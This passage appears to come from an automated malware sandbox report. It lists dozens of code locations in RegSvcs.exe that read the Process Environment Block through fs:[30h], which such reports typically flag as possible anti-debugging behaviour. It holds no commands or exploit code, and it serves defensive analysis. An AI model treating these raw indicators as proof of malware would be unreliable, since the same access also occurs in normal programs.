Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018CB1E1 mov eax, dword ptr fs:[00000030h] 8_2_018CB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018CB1E1 mov eax, dword ptr fs:[00000030h] 8_2_018CB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018CB1E1 mov eax, dword ptr fs:[00000030h] 8_2_018CB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019541E8 mov eax, dword ptr fs:[00000030h] 8_2_019541E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C9100 mov eax, dword ptr fs:[00000030h] 8_2_018C9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C9100 mov eax, dword ptr fs:[00000030h] 8_2_018C9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C9100 mov eax, dword ptr fs:[00000030h] 8_2_018C9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E4120 mov eax, dword ptr fs:[00000030h] 8_2_018E4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E4120 mov eax, dword ptr fs:[00000030h] 8_2_018E4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E4120 mov eax, dword ptr fs:[00000030h] 8_2_018E4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E4120 mov eax, dword ptr fs:[00000030h] 8_2_018E4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E4120 mov ecx, dword ptr fs:[00000030h] 8_2_018E4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F513A mov eax, dword ptr fs:[00000030h] 8_2_018F513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F513A mov eax, dword ptr fs:[00000030h] 8_2_018F513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EB944 mov eax, dword ptr fs:[00000030h] 8_2_018EB944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EB944 mov eax, dword ptr fs:[00000030h] 8_2_018EB944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018CC962 mov eax, dword ptr fs:[00000030h] 8_2_018CC962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018CB171 mov eax, dword ptr fs:[00000030h] 8_2_018CB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018CB171 mov eax, dword ptr fs:[00000030h] 8_2_018CB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C9080 mov eax, dword ptr fs:[00000030h] 8_2_018C9080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01943884 mov eax, dword ptr fs:[00000030h] 8_2_01943884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01943884 mov eax, dword ptr fs:[00000030h] 8_2_01943884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F20A0 mov eax, dword ptr fs:[00000030h] 8_2_018F20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F20A0 mov eax, dword ptr fs:[00000030h] 8_2_018F20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F20A0 mov eax, dword ptr fs:[00000030h] 8_2_018F20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F20A0 mov eax, dword ptr fs:[00000030h] 8_2_018F20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F20A0 mov eax, dword ptr fs:[00000030h] 8_2_018F20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F20A0 mov eax, dword ptr fs:[00000030h] 8_2_018F20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FF0BF mov ecx, dword ptr fs:[00000030h] 8_2_018FF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FF0BF mov eax, dword ptr fs:[00000030h] 8_2_018FF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FF0BF mov eax, dword ptr fs:[00000030h] 8_2_018FF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019090AF mov eax, dword ptr fs:[00000030h] 8_2_019090AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0195B8D0 mov eax, dword ptr fs:[00000030h] 8_2_0195B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0195B8D0 mov ecx, dword ptr fs:[00000030h] 8_2_0195B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0195B8D0 mov eax, dword ptr fs:[00000030h] 8_2_0195B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0195B8D0 mov eax, dword ptr fs:[00000030h] 8_2_0195B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0195B8D0 mov eax, dword ptr fs:[00000030h] 8_2_0195B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0195B8D0 mov eax, dword ptr fs:[00000030h] 8_2_0195B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C58EC mov eax, dword ptr fs:[00000030h] 8_2_018C58EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EB8E4 mov eax, dword ptr fs:[00000030h] 8_2_018EB8E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EB8E4 mov eax, dword ptr fs:[00000030h] 8_2_018EB8E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C40E1 mov eax, dword ptr fs:[00000030h] 8_2_018C40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C40E1 mov eax, dword ptr fs:[00000030h] 8_2_018C40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C40E1 mov eax, dword ptr fs:[00000030h] 8_2_018C40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01947016 mov eax, dword ptr fs:[00000030h] 8_2_01947016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01947016 mov eax, dword ptr fs:[00000030h] 8_2_01947016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01947016 mov eax, dword ptr fs:[00000030h] 8_2_01947016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01994015 mov eax, dword ptr fs:[00000030h] 8_2_01994015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01994015 mov eax, dword ptr fs:[00000030h] 8_2_01994015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F002D mov eax, dword ptr fs:[00000030h] 8_2_018F002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F002D mov eax, dword ptr fs:[00000030h] 8_2_018F002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F002D mov eax, dword ptr fs:[00000030h] 8_2_018F002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F002D mov eax, dword ptr fs:[00000030h] 8_2_018F002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F002D mov eax, dword ptr fs:[00000030h] 8_2_018F002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018DB02A mov eax, dword ptr fs:[00000030h] 8_2_018DB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018DB02A mov eax, dword ptr fs:[00000030h] 8_2_018DB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018DB02A mov eax, dword ptr fs:[00000030h] 8_2_018DB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018DB02A mov eax, dword ptr fs:[00000030h] 8_2_018DB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EA830 mov eax, dword ptr fs:[00000030h] 8_2_018EA830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EA830 mov eax, dword ptr fs:[00000030h] 8_2_018EA830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EA830 mov eax, dword ptr fs:[00000030h] 8_2_018EA830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EA830 mov eax, dword ptr fs:[00000030h] 8_2_018EA830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E0050 mov eax, dword ptr fs:[00000030h] 8_2_018E0050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E0050 mov eax, dword ptr fs:[00000030h] 8_2_018E0050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01982073 mov eax, dword ptr fs:[00000030h] 8_2_01982073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01991074 mov eax, dword ptr fs:[00000030h] 8_2_01991074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D1B8F mov eax, dword ptr fs:[00000030h] 8_2_018D1B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D1B8F mov eax, dword ptr fs:[00000030h] 8_2_018D1B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0198138A mov eax, dword ptr fs:[00000030h] 8_2_0198138A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0197D380 mov ecx, dword ptr fs:[00000030h] 8_2_0197D380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F2397 mov eax, dword ptr fs:[00000030h] 8_2_018F2397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FB390 mov eax, dword ptr fs:[00000030h] 8_2_018FB390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F4BAD mov eax, dword ptr fs:[00000030h] 8_2_018F4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F4BAD mov eax, dword ptr fs:[00000030h] 8_2_018F4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F4BAD mov eax, dword ptr fs:[00000030h] 8_2_018F4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01995BA5 mov eax, dword ptr fs:[00000030h] 8_2_01995BA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019453CA mov eax, dword ptr fs:[00000030h] 8_2_019453CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019453CA mov eax, dword ptr fs:[00000030h] 8_2_019453CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EDBE9 mov eax, dword ptr fs:[00000030h] 8_2_018EDBE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F03E2 mov eax, dword ptr fs:[00000030h] 8_2_018F03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F03E2 mov eax, dword ptr fs:[00000030h] 8_2_018F03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F03E2 mov eax, dword ptr fs:[00000030h] 8_2_018F03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F03E2 mov eax, dword ptr fs:[00000030h] 8_2_018F03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F03E2 mov eax, dword ptr fs:[00000030h] 8_2_018F03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F03E2 mov eax, dword ptr fs:[00000030h] 8_2_018F03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0198131B mov eax, dword ptr fs:[00000030h] 8_2_0198131B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01998B58 mov eax, dword ptr fs:[00000030h] 8_2_01998B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018CDB40 mov eax, dword ptr fs:[00000030h] 8_2_018CDB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018CF358 mov eax, dword ptr fs:[00000030h] 8_2_018CF358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018CDB60 mov ecx, dword ptr fs:[00000030h] 8_2_018CDB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F3B7A mov eax, dword ptr fs:[00000030h] 8_2_018F3B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F3B7A mov eax, dword ptr fs:[00000030h] 8_2_018F3B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FD294 mov eax, dword ptr fs:[00000030h] 8_2_018FD294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FD294 mov eax, dword ptr fs:[00000030h] 8_2_018FD294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C52A5 mov eax, dword ptr fs:[00000030h] 8_2_018C52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C52A5 mov eax, dword ptr fs:[00000030h] 8_2_018C52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C52A5 mov eax, dword ptr fs:[00000030h] 8_2_018C52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C52A5 mov eax, dword ptr fs:[00000030h] 8_2_018C52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C52A5 mov eax, dword ptr fs:[00000030h] 8_2_018C52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018DAAB0 mov eax, dword ptr fs:[00000030h] 8_2_018DAAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018DAAB0 mov eax, dword ptr fs:[00000030h] 8_2_018DAAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FFAB0 mov eax, dword ptr fs:[00000030h] 8_2_018FFAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F2ACB mov eax, dword ptr fs:[00000030h] 8_2_018F2ACB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F2AE4 mov eax, dword ptr fs:[00000030h] 8_2_018F2AE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D8A0A mov eax, dword ptr fs:[00000030h] 8_2_018D8A0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0198AA16 mov eax, dword ptr fs:[00000030h] 8_2_0198AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0198AA16 mov eax, dword ptr fs:[00000030h] 8_2_0198AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E3A1C mov eax, dword ptr fs:[00000030h] 8_2_018E3A1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018CAA16 mov eax, dword ptr fs:[00000030h] 8_2_018CAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018CAA16 mov eax, dword ptr fs:[00000030h] 8_2_018CAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C5210 mov eax, dword ptr fs:[00000030h] 8_2_018C5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C5210 mov ecx, dword ptr fs:[00000030h] 8_2_018C5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C5210 mov eax, dword ptr fs:[00000030h] 8_2_018C5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C5210 mov eax, dword ptr fs:[00000030h] 8_2_018C5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EA229 mov eax, dword ptr fs:[00000030h] 8_2_018EA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EA229 mov eax, dword ptr fs:[00000030h] 8_2_018EA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EA229 mov eax, dword ptr fs:[00000030h] 8_2_018EA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EA229 mov eax, dword ptr fs:[00000030h] 8_2_018EA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EA229 mov eax, dword ptr fs:[00000030h] 8_2_018EA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EA229 mov eax, dword ptr fs:[00000030h] 8_2_018EA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EA229 mov eax, dword ptr fs:[00000030h] 8_2_018EA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EA229 mov eax, dword ptr fs:[00000030h] 8_2_018EA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EA229 mov eax, dword ptr fs:[00000030h] 8_2_018EA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01904A2C mov eax, dword ptr fs:[00000030h] 8_2_01904A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01904A2C mov eax, dword ptr fs:[00000030h] 8_2_01904A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01954257 mov eax, dword ptr fs:[00000030h] 8_2_01954257
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C9240 mov eax, dword ptr fs:[00000030h] 8_2_018C9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C9240 mov eax, dword ptr fs:[00000030h] 8_2_018C9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C9240 mov eax, dword ptr fs:[00000030h] 8_2_018C9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C9240 mov eax, dword ptr fs:[00000030h] 8_2_018C9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0198EA55 mov eax, dword ptr fs:[00000030h] 8_2_0198EA55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0190927A mov eax, dword ptr fs:[00000030h] 8_2_0190927A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0197B260 mov eax, dword ptr fs:[00000030h] 8_2_0197B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0197B260 mov eax, dword ptr fs:[00000030h] 8_2_0197B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01998A62 mov eax, dword ptr fs:[00000030h] 8_2_01998A62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C2D8A mov eax, dword ptr fs:[00000030h] 8_2_018C2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C2D8A mov eax, dword ptr fs:[00000030h] 8_2_018C2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C2D8A mov eax, dword ptr fs:[00000030h] 8_2_018C2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C2D8A mov eax, dword ptr fs:[00000030h] 8_2_018C2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C2D8A mov eax, dword ptr fs:[00000030h] 8_2_018C2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F2581 mov eax, dword ptr fs:[00000030h] 8_2_018F2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F2581 mov eax, dword ptr fs:[00000030h] 8_2_018F2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F2581 mov eax, dword ptr fs:[00000030h] 8_2_018F2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F2581 mov eax, dword ptr fs:[00000030h] 8_2_018F2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FFD9B mov eax, dword ptr fs:[00000030h] 8_2_018FFD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FFD9B mov eax, dword ptr fs:[00000030h] 8_2_018FFD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F35A1 mov eax, dword ptr fs:[00000030h] 8_2_018F35A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019905AC mov eax, dword ptr fs:[00000030h] 8_2_019905AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019905AC mov eax, dword ptr fs:[00000030h] 8_2_019905AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F1DB5 mov eax, dword ptr fs:[00000030h] 8_2_018F1DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F1DB5 mov eax, dword ptr fs:[00000030h] 8_2_018F1DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F1DB5 mov eax, dword ptr fs:[00000030h] 8_2_018F1DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01946DC9 mov eax, dword ptr fs:[00000030h] 8_2_01946DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01946DC9 mov eax, dword ptr fs:[00000030h] 8_2_01946DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01946DC9 mov eax, dword ptr fs:[00000030h] 8_2_01946DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01946DC9 mov ecx, dword ptr fs:[00000030h] 8_2_01946DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01946DC9 mov eax, dword ptr fs:[00000030h] 8_2_01946DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01946DC9 mov eax, dword ptr fs:[00000030h] 8_2_01946DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01978DF1 mov eax, dword ptr fs:[00000030h] 8_2_01978DF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018DD5E0 mov eax, dword ptr fs:[00000030h] 8_2_018DD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018DD5E0 mov eax, dword ptr fs:[00000030h] 8_2_018DD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0198FDE2 mov eax, dword ptr fs:[00000030h] 8_2_0198FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0198FDE2 mov eax, dword ptr fs:[00000030h] 8_2_0198FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0198FDE2 mov eax, dword ptr fs:[00000030h] 8_2_0198FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0198FDE2 mov eax, dword ptr fs:[00000030h] 8_2_0198FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0198E539 mov eax, dword ptr fs:[00000030h] 8_2_0198E539
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0194A537 mov eax, dword ptr fs:[00000030h] 8_2_0194A537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01998D34 mov eax, dword ptr fs:[00000030h] 8_2_01998D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F4D3B mov eax, dword ptr fs:[00000030h] 8_2_018F4D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F4D3B mov eax, dword ptr fs:[00000030h] 8_2_018F4D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F4D3B mov eax, dword ptr fs:[00000030h] 8_2_018F4D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h] 8_2_018D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h] 8_2_018D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h] 8_2_018D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h] 8_2_018D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h] 8_2_018D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h] 8_2_018D3D34
